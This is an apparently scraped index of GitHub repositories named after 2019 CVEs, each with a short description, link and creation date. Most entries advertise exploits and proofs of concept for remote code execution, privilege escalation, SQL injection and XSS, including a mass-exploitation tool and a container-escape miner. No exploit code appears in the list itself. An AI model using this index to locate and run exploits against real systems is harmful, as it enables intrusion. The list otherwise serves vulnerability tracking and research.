**Exploit POC for the bug CVE-2019-8781, found by @LinusHenze** : [TrungNguyen1909/CVE-2019-8781-macOS](https://api.github.com/repos/TrungNguyen1909/CVE-2019-8781-macOS) create time: 2019-10-27T10:28:35Z

**apache axis1.4远程代码执行漏洞** : [ianxtianxt/cve-2019-0227](https://api.github.com/repos/ianxtianxt/cve-2019-0227) create time: 2019-10-27T14:42:54Z

**weblogic_cve-2019-2888** : [21superman/weblogic_cve-2019-2888](https://api.github.com/repos/21superman/weblogic_cve-2019-2888) create time: 2019-10-28T06:10:44Z

**None** : [akamajoris/CVE-2019-11043-Docker](https://api.github.com/repos/akamajoris/CVE-2019-11043-Docker) create time: 2019-10-24T12:32:02Z

**None** : [Mayter/CVE-2019-1315](https://api.github.com/repos/Mayter/CVE-2019-1315) create time: 2019-10-29T08:36:25Z

**Clone code from https://github.com/v-gift/CVE-2019-2890** : [Ky0-HVA/CVE-2019-2890](https://api.github.com/repos/Ky0-HVA/CVE-2019-2890) create time: 2019-10-29T08:53:28Z

**CVE-2019-11043 PHP远程代码执行** : [shadow-horse/cve-2019-11043](https://api.github.com/repos/shadow-horse/cve-2019-11043) create time: 2019-10-28T15:31:34Z

**(PoC) Python version of CVE-2019-11043 exploit by neex** : [theMiddleBlue/CVE-2019-11043](https://api.github.com/repos/theMiddleBlue/CVE-2019-11043) create time: 2019-10-28T11:09:06Z

**Python exp for CVE-2019-11043** : [huowen/CVE-2019-11043](https://api.github.com/repos/huowen/CVE-2019-11043) create time: 2019-10-29T11:16:12Z

**Docker image and commands to check CVE-2019-11043 vulnerability on nginx/php-fpm applications.** : [ypereirareis/docker-CVE-2019-11043](https://api.github.com/repos/ypereirareis/docker-CVE-2019-11043) create time: 2019-10-30T10:22:41Z

**漏洞demo** : [Rivaill/CVE_2019_14234](https://api.github.com/repos/Rivaill/CVE_2019_14234) create time: 2019-08-03T04:49:56Z

**None** : [whoami0622/CVE-2019-7610](https://api.github.com/repos/whoami0622/CVE-2019-7610) create time: 2019-11-04T02:42:40Z

**wait for exp.** : [evilangelplus/CVE-2019-10086](https://api.github.com/repos/evilangelplus/CVE-2019-10086) create time: 2019-11-01T02:36:17Z

**Remote Code Execution Vulnerability in Webmin** : [AleWong/WebminRCE-EXP-CVE-2019-15107-](https://api.github.com/repos/AleWong/WebminRCE-EXP-CVE-2019-15107-) create time: 2019-10-24T05:19:20Z

**Apache Solr remote code execution via dataImportHandler** : [Rapidsafeguard/Solr-RCE-CVE-2019-0192](https://api.github.com/repos/Rapidsafeguard/Solr-RCE-CVE-2019-0192) create time: 2019-11-01T13:46:37Z

**Confluence 未授权 RCE (CVE-2019-3396) 漏洞** : [jas502n/CVE-2019-3396](https://api.github.com/repos/jas502n/CVE-2019-3396) create time: 2019-04-10T02:22:24Z

**None** : [masahiro331/CVE-2019-13574](https://api.github.com/repos/masahiro331/CVE-2019-13574) create time: 2019-07-16T07:17:57Z

**Enpass** : [GitHubAssessments/CVE_Assessments_09_2019](https://api.github.com/repos/GitHubAssessments/CVE_Assessments_09_2019) create time: 2019-11-01T18:49:12Z

**None** : [angeloanatrella86/CVE-2019](https://api.github.com/repos/angeloanatrella86/CVE-2019) create time: 2019-11-01T15:58:27Z

**WebLogic EJBTaglibDescriptor XXE漏洞(CVE-2019-2888)** : [jas502n/CVE-2019-2888](https://api.github.com/repos/jas502n/CVE-2019-2888) create time: 2019-11-01T16:44:51Z

**None** : [FurqanKhan1/CVE-2019-13497](https://api.github.com/repos/FurqanKhan1/CVE-2019-13497) create time: 2019-11-02T12:29:26Z

**Programa ideal para robar toda la información de un dispositivo remotamente a través de la aplicación AirDroid. [CVE-2019-9599] (https://www.exploit-db.com/exploits/46337)** : [s4vitar/AirDroidPwner](https://api.github.com/repos/s4vitar/AirDroidPwner) create time: 2019-02-09T02:18:37Z

**Research Regarding CVE-2019-0708.** : [turingcompl33t/bluekeep](https://api.github.com/repos/turingcompl33t/bluekeep) create time: 2019-08-18T02:34:31Z

**POC for CVE-2019-13720** : [cve-2019-13720/cve-2019-13720](https://api.github.com/repos/cve-2019-13720/cve-2019-13720) create time: 2019-11-04T12:40:28Z

**weaponized radare2 vulnerability found by @CaptnBanana and blenk92** : [xooxo/CVE-2019-14745](https://api.github.com/repos/xooxo/CVE-2019-14745) create time: 2019-11-04T22:31:27Z

**EXPLOITING CVE 2019-14205** : [security-kma/EXPLOITING-CVE-2019-14205](https://api.github.com/repos/security-kma/EXPLOITING-CVE-2019-14205) create time: 2019-11-05T03:47:06Z

**Optional Mitigation Steps** : [ras313/CVE-2019-12314](https://api.github.com/repos/ras313/CVE-2019-12314) create time: 2019-11-05T13:45:58Z

**CVE-2019-2725** : [ianxtianxt/CVE-2019-2725](https://api.github.com/repos/ianxtianxt/CVE-2019-2725) create time: 2019-11-05T14:35:16Z

**自用验证** : [he1dan/cve-2019-2618](https://api.github.com/repos/he1dan/cve-2019-2618) create time: 2019-11-05T14:57:23Z

**PoC for Webmin Package Update Authenticated Remote Command Execution** : [bkaraceylan/CVE-2019-12840_POC](https://api.github.com/repos/bkaraceylan/CVE-2019-12840_POC) create time: 2019-11-05T19:22:45Z

**CVE-2019-5010 Exploit PoC - Python Denial of Service via Malformed X.509v3 Extension** : [JonathanWilbur/CVE-2019-5010](https://api.github.com/repos/JonathanWilbur/CVE-2019-5010) create time: 2019-11-06T07:26:43Z

**CVE-2019-11043 && PHP7.x && RCE EXP** : [MRdoulestar/CVE-2019-11043](https://api.github.com/repos/MRdoulestar/CVE-2019-11043) create time: 2019-11-06T14:53:13Z

**CVE-2019-11043 PHP7.x RCE** : [0th3rs-Security-Team/CVE-2019-11043](https://api.github.com/repos/0th3rs-Security-Team/CVE-2019-11043) create time: 2019-11-06T15:44:47Z

**None** : [vesche/CVE-2019-10475](https://api.github.com/repos/vesche/CVE-2019-10475) create time: 2019-11-06T22:19:01Z

**Write-up on the CVE-2019-9745 vulnerability.** : [KPN-CISO/CVE-2019-9745](https://api.github.com/repos/KPN-CISO/CVE-2019-9745) create time: 2019-10-14T09:44:44Z

**Centreon v.19.04 Remote Code Execution exploit (CVE-2019-13024)** : [get-get-get-get/Centreon-RCE](https://api.github.com/repos/get-get-get-get/Centreon-RCE) create time: 2019-11-08T16:46:13Z

**A standalone POC for CVE-2019-12840** : [KrE80r/webmin_cve-2019-12840_poc](https://api.github.com/repos/KrE80r/webmin_cve-2019-12840_poc) create time: 2019-11-09T17:48:39Z

**The official exploit for rConfig 3.9.2 Pre-auth Remote Code Execution CVE-2019-16662** : [mhaskar/CVE-2019-16662](https://api.github.com/repos/mhaskar/CVE-2019-16662) create time: 2019-11-10T18:26:25Z

**The official exploit for rConfig 3.9.2 Post-auth Remote Code Execution CVE-2019-16663** : [mhaskar/CVE-2019-16663](https://api.github.com/repos/mhaskar/CVE-2019-16663) create time: 2019-11-10T18:28:11Z

**CVE-2019-13498** : [FurqanKhan1/CVE-2019-13498](https://api.github.com/repos/FurqanKhan1/CVE-2019-13498) create time: 2019-08-02T21:22:23Z

**None** : [FurqanKhan1/CVE-2019-13496](https://api.github.com/repos/FurqanKhan1/CVE-2019-13496) create time: 2019-11-02T11:41:25Z

**Ladon POC Moudle CVE-2019-11043 (PHP-FPM + Ngnix)** : [k8gege/CVE-2019-11043](https://api.github.com/repos/k8gege/CVE-2019-11043) create time: 2019-11-11T11:29:54Z

**cve-2019-14287** : [wenyu1999/sudo-](https://api.github.com/repos/wenyu1999/sudo-) create time: 2019-11-11T12:01:02Z

**None** : [timwr/CVE-2019-2215](https://api.github.com/repos/timwr/CVE-2019-2215) create time: 2019-10-04T06:32:08Z

**None** : [Sindadziy/cve-2019-14287](https://api.github.com/repos/Sindadziy/cve-2019-14287) create time: 2019-11-12T12:17:48Z

**None** : [random-robbie/cve-2019-6715](https://api.github.com/repos/random-robbie/cve-2019-6715) create time: 2019-11-12T14:47:25Z

**Exploit for CVE-2019-11043** : [neex/phuip-fpizdam](https://api.github.com/repos/neex/phuip-fpizdam) create time: 2019-09-23T21:37:27Z

**None** : [huang919/cve-2019-14287-PPT](https://api.github.com/repos/huang919/cve-2019-14287-PPT) create time: 2019-10-28T03:27:23Z

**FUDForum 3.0.9 - XSS / Remote Code Execution (CVE-2019-18873, CVE-2019-18839)** : [fuzzlove/FUDforum-XSS-RCE](https://api.github.com/repos/fuzzlove/FUDforum-XSS-RCE) create time: 2019-10-27T03:07:26Z

**Harbor 未授权创建管理员漏洞原理 docker及poc[基于pocsuite框架]** : [luckybool1020/CVE-2019-16097](https://api.github.com/repos/luckybool1020/CVE-2019-16097) create time: 2019-11-14T10:19:47Z

**Privilege Escalation: Weaponizing CVE-2019-1405 and CVE-2019-1322** : [apt69/COMahawk](https://api.github.com/repos/apt69/COMahawk) create time: 2019-11-13T16:34:03Z

**Use RedxploitHQ to create a new Admin user into redwoodhq and get all the functions on the framework** : [EthicalHCOP/CVE-2019-12890_RedxploitHQ](https://api.github.com/repos/EthicalHCOP/CVE-2019-12890_RedxploitHQ) create time: 2019-11-15T12:41:19Z

**GOG Galaxy Exploit for CVE-2019-15511** : [adenkiewicz/CVE-2019-15511](https://api.github.com/repos/adenkiewicz/CVE-2019-15511) create time: 2019-08-21T13:52:13Z

**None** : [chosam2/cve-2019-5736-poc](https://api.github.com/repos/chosam2/cve-2019-5736-poc) create time: 2019-10-12T07:22:57Z

**RCE Exploit For CVE-2019-17424 (nipper-ng 0.11.10)** : [guywhataguy/CVE-2019-17424](https://api.github.com/repos/guywhataguy/CVE-2019-17424) create time: 2019-10-20T21:20:28Z

**cve-2019-11931** : [kasif-dekel/whatsapp-rce-patched](https://api.github.com/repos/kasif-dekel/whatsapp-rce-patched) create time: 2019-11-16T11:06:52Z

**Exploit for XSS via BBCode on Kunena extension before 5.1.14 for Joomla!** : [h3llraiser/CVE-2019-15120](https://api.github.com/repos/h3llraiser/CVE-2019-15120) create time: 2019-09-24T12:47:09Z

**remote debug environment for CLion** : [moniik/CVE-2019-11043_env](https://api.github.com/repos/moniik/CVE-2019-11043_env) create time: 2019-11-17T05:16:02Z

**Public work for CVE-2019-0708** : [0xeb-bp/bluekeep](https://api.github.com/repos/0xeb-bp/bluekeep) create time: 2019-07-23T03:15:53Z

**cve-2019-2618 需要用户名密码** : [ianxtianxt/cve-2019-2618](https://api.github.com/repos/ianxtianxt/cve-2019-2618) create time: 2019-11-19T04:12:39Z

**Audacity** : [GitHubAssessments/CVE_Assessments_10_2019](https://api.github.com/repos/GitHubAssessments/CVE_Assessments_10_2019) create time: 2019-11-19T04:51:56Z

**None** : [tarantula-team/CVE-2019-12541](https://api.github.com/repos/tarantula-team/CVE-2019-12541) create time: 2019-06-04T09:40:20Z

**None** : [tarantula-team/CVE-2019-12542](https://api.github.com/repos/tarantula-team/CVE-2019-12542) create time: 2019-06-04T09:46:51Z

**None** : [tarantula-team/CVE-2019-12543](https://api.github.com/repos/tarantula-team/CVE-2019-12543) create time: 2019-06-04T09:51:42Z

**None** : [tarantula-team/CVE-2019-12538](https://api.github.com/repos/tarantula-team/CVE-2019-12538) create time: 2019-06-04T09:32:10Z

**Apache Solr RCE (ENABLE_REMOTE_JMX_OPTS="true")** : [jas502n/CVE-2019-12409](https://api.github.com/repos/jas502n/CVE-2019-12409) create time: 2019-11-19T08:53:56Z

**None** : [random-robbie/CVE-2019-5418](https://api.github.com/repos/random-robbie/CVE-2019-5418) create time: 2019-11-19T09:40:06Z

**iNPUT-ACE 2.2.1** : [GitHubAssessments/CVE_Assessment_01_2019](https://api.github.com/repos/GitHubAssessments/CVE_Assessment_01_2019) create time: 2019-01-22T04:49:40Z

**Local Privilege Escalation in HP Support Assistant** : [ManhNDd/CVE-2019-6329](https://api.github.com/repos/ManhNDd/CVE-2019-6329) create time: 2019-10-13T09:20:16Z

**Scripts that can be used to exploit CVE-2019-15972 which was an Authenticated SQLi issue in Cisco Unified Call Manager (UCM).** : [FSecureLABS/Cisco-UCM-SQLi-Scripts](https://api.github.com/repos/FSecureLABS/Cisco-UCM-SQLi-Scripts) create time: 2019-11-19T16:38:39Z

**An integer overflow in the search_in_range function in regexec.c in Oniguruma 6.x before 6.9.4_rc2 leads to an out-of-bounds read** : [tarantula-team/CVE-2019-19012](https://api.github.com/repos/tarantula-team/CVE-2019-19012) create time: 2019-11-20T14:32:23Z

**Integer overflow in Oniguruma** : [ManhNDd/CVE-2019-19012](https://api.github.com/repos/ManhNDd/CVE-2019-19012) create time: 2019-11-20T10:00:18Z

**Sudo Flaw Linux Users Can Run Commands As Root Even When They're Restricted** : [kumar1100/CVE2019-14287](https://api.github.com/repos/kumar1100/CVE2019-14287) create time: 2019-10-23T13:26:43Z

**None** : [am6539/CVE-2019-3396](https://api.github.com/repos/am6539/CVE-2019-3396) create time: 2019-11-21T03:07:08Z

**1Password** : [GitHubAssessments/CVE_Assessments_11_2019](https://api.github.com/repos/GitHubAssessments/CVE_Assessments_11_2019) create time: 2019-11-21T04:42:45Z

**xnu kernel heap info leak** : [maldiohead/CVE-2019-6207](https://api.github.com/repos/maldiohead/CVE-2019-6207) create time: 2019-05-17T06:37:07Z

**None** : [jaychouzzk/CVE-2019-1388](https://api.github.com/repos/jaychouzzk/CVE-2019-1388) create time: 2019-11-21T08:38:38Z

**CVE-2019-1388 UAC提权 (nt authority\system)** : [jas502n/CVE-2019-1388](https://api.github.com/repos/jas502n/CVE-2019-1388) create time: 2019-11-21T06:26:27Z

**CVE-2019-0232-Remote Code Execution on Apache Tomcat 7.0.42** : [setrus/CVE-2019-0232](https://api.github.com/repos/setrus/CVE-2019-0232) create time: 2019-11-21T14:25:39Z

**Heap-buffer-overflow in Oniguruma (function fetch_interval_quantifier)** : [ManhNDd/CVE-2019-19204](https://api.github.com/repos/ManhNDd/CVE-2019-19204) create time: 2019-11-21T23:53:16Z

**Heap-buffer-overflow in Oniguruma (function gb18030_mbc_enc_len)** : [ManhNDd/CVE-2019-19203](https://api.github.com/repos/ManhNDd/CVE-2019-19203) create time: 2019-11-21T22:43:34Z

**None** : [ulisesrc/-2-CVE-2019-0708](https://api.github.com/repos/ulisesrc/-2-CVE-2019-0708) create time: 2019-11-22T04:00:49Z

**A quick python exploit for the Nostromo 1.9.6 remote code execution vulnerability. Simply takes a host and port that the web server is running on. ** : [AnubisSec/CVE-2019-16278](https://api.github.com/repos/AnubisSec/CVE-2019-16278) create time: 2019-11-22T18:35:14Z

**None** : [nop-team/CVE-2019-11931](https://api.github.com/repos/nop-team/CVE-2019-11931) create time: 2019-11-23T14:06:13Z

**None** : [timwr/CVE-2019-5825](https://api.github.com/repos/timwr/CVE-2019-5825) create time: 2019-11-23T11:35:34Z

**Crestron/Barco/Extron/InFocus/TeqAV Remote Command Injection (CVE-2019-3929) Metasploit Module** : [xfox64x/CVE-2019-3929](https://api.github.com/repos/xfox64x/CVE-2019-3929) create time: 2019-09-17T16:23:04Z

**Python script to exploit RCE in Nostromo nhttpd <= 1.9.6.** : [theRealFr13nd/CVE-2019-16278-Nostromo_1.9.6-RCE](https://api.github.com/repos/theRealFr13nd/CVE-2019-16278-Nostromo_1.9.6-RCE) create time: 2019-11-26T14:15:44Z

**Apache Tomcat Remote Code Execution on Windows** : [pyn3rd/CVE-2019-0232](https://api.github.com/repos/pyn3rd/CVE-2019-0232) create time: 2019-04-15T07:54:25Z

**None** : [fade-vivida/CVE-2019-0708-test](https://api.github.com/repos/fade-vivida/CVE-2019-0708-test) create time: 2019-08-21T00:48:55Z

**Suricata LUA scripts to detect CVE-2019-12255, CVE-2019-12256, CVE-2019-12258, and CVE-2019-12260** : [sud0woodo/Urgent11-Suricata-LUA-scripts](https://api.github.com/repos/sud0woodo/Urgent11-Suricata-LUA-scripts) create time: 2019-11-12T20:43:46Z

**None** : [ze0r/cve-2019-1422](https://api.github.com/repos/ze0r/cve-2019-1422) create time: 2019-11-29T02:58:32Z

**Simple POC for exploiting WhatsApp double-free bug in DDGifSlurp in decoding.c in libpl_droidsonroids_gif** : [awakened1712/CVE-2019-11932](https://api.github.com/repos/awakened1712/CVE-2019-11932) create time: 2019-10-04T14:43:57Z

**None** : [hekadan/CVE-2019-7609](https://api.github.com/repos/hekadan/CVE-2019-7609) create time: 2019-12-01T14:29:22Z

**CVE-2019-0708 DOS RDP** : [Hen51/CVE-2019-0708-DOS](https://api.github.com/repos/Hen51/CVE-2019-0708-DOS) create time: 2019-11-13T10:49:51Z

**CVE-2019-19033 description and scripts to check the vulnerability in Jalios JCMS 10 (Authentication Bypass)** : [ricardojoserf/CVE-2019-19033](https://api.github.com/repos/ricardojoserf/CVE-2019-19033) create time: 2019-11-17T19:32:10Z

**Sudo Vulnerability CVE-2019-14287** : [Unam3dd/sudo-vulnerability-CVE-2019-14287](https://api.github.com/repos/Unam3dd/sudo-vulnerability-CVE-2019-14287) create time: 2019-12-04T07:24:51Z

**New Found 0-days!** : [TheCyberGeek/CVE-2019-19268](https://api.github.com/repos/TheCyberGeek/CVE-2019-19268) create time: 2019-11-25T11:14:26Z

**CVE-2019-5700** : [oscardagrach/CVE-2019-5700](https://api.github.com/repos/oscardagrach/CVE-2019-5700) create time: 2019-12-05T19:54:33Z

**None** : [SukaraLin/CVE-2019-2890](https://api.github.com/repos/SukaraLin/CVE-2019-2890) create time: 2019-12-06T08:46:31Z

**Version-contains-cve-2019-12272** : [roguedream/lede-17.01.3](https://api.github.com/repos/roguedream/lede-17.01.3) create time: 2019-12-06T22:04:24Z

**CVE-2019-2890 WebLogic 反序列化RCE漏洞** : [jas502n/CVE-2019-2890](https://api.github.com/repos/jas502n/CVE-2019-2890) create time: 2019-12-08T05:03:32Z

**This is a filter bypass exploit that results in arbitrary file upload and remote code execution in class.upload.php <= 2.0.4** : [jra89/CVE-2019-19634](https://api.github.com/repos/jra89/CVE-2019-19634) create time: 2019-12-08T10:44:51Z

**AppXSvc Arbitrary File Overwrite DoS** : [sgabe/CVE-2019-1476](https://api.github.com/repos/sgabe/CVE-2019-1476) create time: 2019-12-05T21:00:16Z

**The latest workaround for the "Query is corrupt" error introduced with CVE-2019-1402** : [lauxjpn/CorruptQueryAccessWorkaround](https://api.github.com/repos/lauxjpn/CorruptQueryAccessWorkaround) create time: 2019-11-14T19:11:27Z

**Chevereto reflected XSS in Website Name - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core** : [jra89/CVE-2019-19651](https://api.github.com/repos/jra89/CVE-2019-19651) create time: 2019-12-11T14:00:32Z

**Chevereto downgrade attack - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core** : [jra89/CVE-2019-19652](https://api.github.com/repos/jra89/CVE-2019-19652) create time: 2019-12-11T13:42:18Z

**CVE-2019-2725-POC** : [N0b1e6/CVE-2019-2725-POC](https://api.github.com/repos/N0b1e6/CVE-2019-2725-POC) create time: 2019-12-12T03:09:23Z

**Chevereto stored XSS in profile page - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core** : [jra89/CVE-2019-19658](https://api.github.com/repos/jra89/CVE-2019-19658) create time: 2019-12-11T14:13:51Z

**Yetishare SQL Injection (sSortDir_0) - v3.5.2 - v4.5.3** : [jra89/CVE-2019-19732](https://api.github.com/repos/jra89/CVE-2019-19732) create time: 2019-12-12T12:08:49Z

**YetiShare SQL Injection in the fileIds parameter in _account_move_file_in_folder.ajax.php - v3.5.2** : [jra89/CVE-2019-19734](https://api.github.com/repos/jra89/CVE-2019-19734) create time: 2019-12-12T14:31:49Z

**Code sample for using exploit CVE-2019-5736 to mine bitcoin with no association to original container or user.** : [epsteina16/Docker-Escape-Miner](https://api.github.com/repos/epsteina16/Docker-Escape-Miner) create time: 2019-12-12T16:57:13Z

**For test** : [W2Ning/CVE-2019-3396](https://api.github.com/repos/W2Ning/CVE-2019-3396) create time: 2019-12-12T07:40:22Z

**CVE-2019–11581 PoC** : [kobs0N/CVE-2019-11581](https://api.github.com/repos/kobs0N/CVE-2019-11581) create time: 2019-07-25T05:29:23Z

**0-sec.org** : [ianxtianxt/CVE-2019-2890](https://api.github.com/repos/ianxtianxt/CVE-2019-2890) create time: 2019-12-14T08:01:53Z

**None** : [ianxtianxt/CVE-2019-15107](https://api.github.com/repos/ianxtianxt/CVE-2019-15107) create time: 2019-12-15T13:42:28Z

**None** : [SmoZy92/CVE-2019-11932](https://api.github.com/repos/SmoZy92/CVE-2019-11932) create time: 2019-12-15T17:21:26Z

**Banner Web Tailor and Banner Enterprise Identity Services Vulnerability Disclosure** : [JoshuaMulliken/CVE-2019-8978](https://api.github.com/repos/JoshuaMulliken/CVE-2019-8978) create time: 2019-05-10T19:46:58Z

**Tool Suite for V0LTpwn (CVE-2019-11157). Code will be published soon.** : [zkenjar/v0ltpwn](https://api.github.com/repos/zkenjar/v0ltpwn) create time: 2019-12-15T15:11:07Z

**Nalpeiron Licensing Service (NLSSRV32) arbitrary disk read [CVE-2019-19315]** : [monoxgas/mailorder](https://api.github.com/repos/monoxgas/mailorder) create time: 2019-12-17T02:41:20Z

**YetiShare v3.5.2 - v4.5.3 Cross-site scripting in get_all_file_server_paths.ajax.php** : [jra89/CVE-2019-19733](https://api.github.com/repos/jra89/CVE-2019-19733) create time: 2019-12-17T21:56:56Z

**YetiShare v3.5.2 - v4.5.3 Cross-site scripting in log_file_viewer.php** : [jra89/CVE-2019-19738](https://api.github.com/repos/jra89/CVE-2019-19738) create time: 2019-12-17T22:02:40Z

**Page Cache Side Channel Attacks (CVE-2019-5489) proof of concept for Linux** : [mmxsrup/CVE-2019-5489](https://api.github.com/repos/mmxsrup/CVE-2019-5489) create time: 2019-12-06T05:37:08Z

**RCE on Kibana versions before 5.6.15 and 6.6.0 in the Timelion visualizer** : [mpgn/CVE-2019-7609](https://api.github.com/repos/mpgn/CVE-2019-7609) create time: 2019-10-21T07:32:31Z

**Eclipse Che CSRF leading to RCE** : [mgrube/CVE-2019-17633](https://api.github.com/repos/mgrube/CVE-2019-17633) create time: 2019-12-19T20:22:12Z

**YetiShare password reset hash bruteforce - v3.5.2 - v4.5.3** : [jra89/CVE-2019-19735](https://api.github.com/repos/jra89/CVE-2019-19735) create time: 2019-12-12T11:56:00Z

**sploit** : [v-p-b/cve-2019-12750](https://api.github.com/repos/v-p-b/cve-2019-12750) create time: 2019-12-21T00:44:25Z

**https://techdocs.broadcom.com/us/product-content/recommended-reading/security-notices/CA20191218-01-security-notice-for-ca-client-automation-agent-for-windows.html** : [hessandrew/CVE-2019-19231](https://api.github.com/repos/hessandrew/CVE-2019-19231) create time: 2019-12-21T09:23:51Z

**lib/G/functions.php in Chevereto 1.0.0 through 1.1.4 Free, and through 3.13.5 Core, allows an attacker to perform bruteforce attacks without triggering the implemented protection mechanism by manipulating the X-Forwarded-For header in the request.** : [jra89/CVE-2019-19633](https://api.github.com/repos/jra89/CVE-2019-19633) create time: 2019-12-08T10:42:28Z

**Exploit and Mass Pwn3r for CVE-2019-16920** : [pwnhacker0x18/CVE-2019-16920-MassPwn3r](https://api.github.com/repos/pwnhacker0x18/CVE-2019-16920-MassPwn3r) create time: 2019-10-15T17:54:03Z

**None** : [alidnf/CVE-2019-11730](https://api.github.com/repos/alidnf/CVE-2019-11730) create time: 2019-12-22T19:14:05Z

**Proof of conecept for CVE-2019-16889 (Resource consumption on Ubiquiti Edgemax 1.10.6 and earlier** : [grampae/meep](https://api.github.com/repos/grampae/meep) create time: 2019-12-09T00:09:08Z

**An issue was discovered in Oniguruma 6.x before 6.9.4_rc2. In the function gb18030_mbc_enc_len in file gb18030.c, a UChar pointer is dereferenced without checking if it passed the end of the matched string. This leads to a heap-based buffer over-read** : [tarantula-team/CVE-2019-19203](https://api.github.com/repos/tarantula-team/CVE-2019-19203) create time: 2019-12-24T08:11:11Z

**Heap-buffer-overflow in Oniguruma (function fetch_interval_quantifier)** : [tarantula-team/CVE-2019-19204](https://api.github.com/repos/tarantula-team/CVE-2019-19204) create time: 2019-12-24T08:19:02Z

**PoC for CVE-2019-19844(https://www.djangoproject.com/weblog/2019/dec/18/security-releases/)** : [ryu22e/django_cve_2019_19844_poc](https://api.github.com/repos/ryu22e/django_cve_2019_19844_poc) create time: 2019-12-21T04:30:34Z

**None** : [SecT0uch/CVE-2019-17495-test](https://api.github.com/repos/SecT0uch/CVE-2019-17495-test) create time: 2019-12-24T13:23:06Z

**Enjoy hacking ;)** : [0x413x4/CVE-2019-1385](https://api.github.com/repos/0x413x4/CVE-2019-1385) create time: 2020-06-03T22:06:49Z

**Enjoy hacking ;)** : [klinix5/CVE-2019-1385](https://api.github.com/repos/klinix5/CVE-2019-1385) create time: 2019-12-25T11:03:52Z

**poc exploit for webmin backdoor (CVE-2019-15107 and CVE-2019-15231)** : [hannob/webminex](https://api.github.com/repos/hannob/webminex) create time: 2019-12-25T13:47:02Z

**Apache Log4j 1.2.X存在反序列化远程代码执行漏洞** : [shadow-horse/CVE-2019-17571](https://api.github.com/repos/shadow-horse/CVE-2019-17571) create time: 2019-12-25T16:46:11Z

**None** : [masahiro331/CVE-2019-10758](https://api.github.com/repos/masahiro331/CVE-2019-10758) create time: 2019-12-26T06:58:56Z

**Exploit for CVE-2019-9810 Firefox on Windows 64-bit.** : [0vercl0k/CVE-2019-9810](https://api.github.com/repos/0vercl0k/CVE-2019-9810) create time: 2019-05-05T17:19:02Z

**webmin_CVE-2019-15107** : [ChakoMoonFish/webmin_CVE-2019-15107](https://api.github.com/repos/ChakoMoonFish/webmin_CVE-2019-15107) create time: 2019-12-29T11:02:35Z

**(Nhttpd) Nostromo 1.9.6 RCE due to Directory Traversal ** : [Kr0ff/cve-2019-16278](https://api.github.com/repos/Kr0ff/cve-2019-16278) create time: 2019-12-31T16:06:13Z

**CVE-2019-16278:Nostromo Web服务器的RCE漏洞** : [NHPT/CVE-2019-16278](https://api.github.com/repos/NHPT/CVE-2019-16278) create time: 2020-01-01T13:28:40Z

**None** : [alidnf/CVE-2019-13404](https://api.github.com/repos/alidnf/CVE-2019-13404) create time: 2020-01-01T14:00:55Z

**Exploiting a patched vulnerability in JavaScriptCore** : [BadAccess11/CVE-2019-8601](https://api.github.com/repos/BadAccess11/CVE-2019-8601) create time: 2020-01-02T00:12:22Z

**CVE-2019-17427 Persistent XSS POC** : [RealLinkers/CVE-2019-17427](https://api.github.com/repos/RealLinkers/CVE-2019-17427) create time: 2020-01-03T19:25:54Z

**CVE-2019-10758** : [lp008/CVE-2019-10758](https://api.github.com/repos/lp008/CVE-2019-10758) create time: 2020-01-05T14:05:56Z

**CVE-2019-18890 POC (Proof of Concept)** : [RealLinkers/CVE-2019-18890](https://api.github.com/repos/RealLinkers/CVE-2019-18890) create time: 2020-01-02T11:44:47Z

**Chevereto information disclosure <= 3.13.5 Core** : [jra89/CVE-2019-19653](https://api.github.com/repos/jra89/CVE-2019-19653) create time: 2019-12-11T13:49:51Z

**Chevereto denial of service - <= 3.13.5 Core** : [jra89/CVE-2019-19654](https://api.github.com/repos/jra89/CVE-2019-19654) create time: 2019-12-11T12:26:16Z

**Chevereto - 1.0.0 Free - 1.1.4 Free, 3.13.4 Core, Remote Code Execution** : [jra89/CVE-2019-19511](https://api.github.com/repos/jra89/CVE-2019-19511) create time: 2019-12-04T09:37:29Z

**Systematic Analysis of Lens-Expressed RNA-Binding Proteins** : [paullangard/CveklRBP2019](https://api.github.com/repos/paullangard/CveklRBP2019) create time: 2019-12-21T19:54:42Z

**CVE-2019-10092 Docker - Apache HTTP Server** : [motikan2010/CVE-2019-10092_Docker](https://api.github.com/repos/motikan2010/CVE-2019-10092_Docker) create time: 2019-12-18T14:15:13Z

**None** : [bluefrostsecurity/CVE-2019-1215](https://api.github.com/repos/bluefrostsecurity/CVE-2019-1215) create time: 2020-01-06T22:34:16Z

**https://www.rodneybeede.com/curriculum%20vitae/bio.html** : [rbeede/CVE-2019-5630](https://api.github.com/repos/rbeede/CVE-2019-5630) create time: 2020-01-07T19:43:42Z

**weblogic CVE-2019-2725利用exp。** : [GGyao/weblogic_2019_2725_wls_batch](https://api.github.com/repos/GGyao/weblogic_2019_2725_wls_batch) create time: 2020-01-08T06:35:28Z

**CVE-2019-20197** : [lp008/CVE-2019-20197](https://api.github.com/repos/lp008/CVE-2019-20197) create time: 2020-01-08T08:11:58Z

**Nagios XI远程命令执行漏洞 <v5.6.9** : [jas502n/CVE-2019-20197](https://api.github.com/repos/jas502n/CVE-2019-20197) create time: 2020-01-08T08:16:30Z

**None** : [Sindayifu/CVE-2019-14287-CVE-2014-6271](https://api.github.com/repos/Sindayifu/CVE-2019-14287-CVE-2014-6271) create time: 2019-11-13T14:17:19Z

**None** : [mekoko/CVE-2019-19781](https://api.github.com/repos/mekoko/CVE-2019-19781) create time: 2020-01-10T02:05:51Z

**CVE-2019-17558 Solr模板注入漏洞图形化一键检测工具。CVE-2019-17558 Solr Velocity Template Vul POC Tool.** : [SDNDTeam/CVE-2019-17558_Solr_Vul_Tool](https://api.github.com/repos/SDNDTeam/CVE-2019-17558_Solr_Vul_Tool) create time: 2019-11-25T10:54:20Z

**The offical exploit for Pandora v7.0NG Post-auth Remote Code Execution CVE-2019-20224** : [mhaskar/CVE-2019-20224](https://api.github.com/repos/mhaskar/CVE-2019-20224) create time: 2020-01-10T13:41:28Z

**Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway [ CVE-2019-19781 ]** : [ianxtianxt/CVE-2019-19781](https://api.github.com/repos/ianxtianxt/CVE-2019-19781) create time: 2020-01-11T07:16:23Z

**CVE-2019-16278Nostromo httpd命令执行** : [ianxtianxt/CVE-2019-16278](https://api.github.com/repos/ianxtianxt/CVE-2019-16278) create time: 2019-10-15T12:47:59Z

**CVE-2019-19781 Citrix RCE** : [oways/CVE-2019-19781](https://api.github.com/repos/oways/CVE-2019-19781) create time: 2020-01-11T13:05:28Z

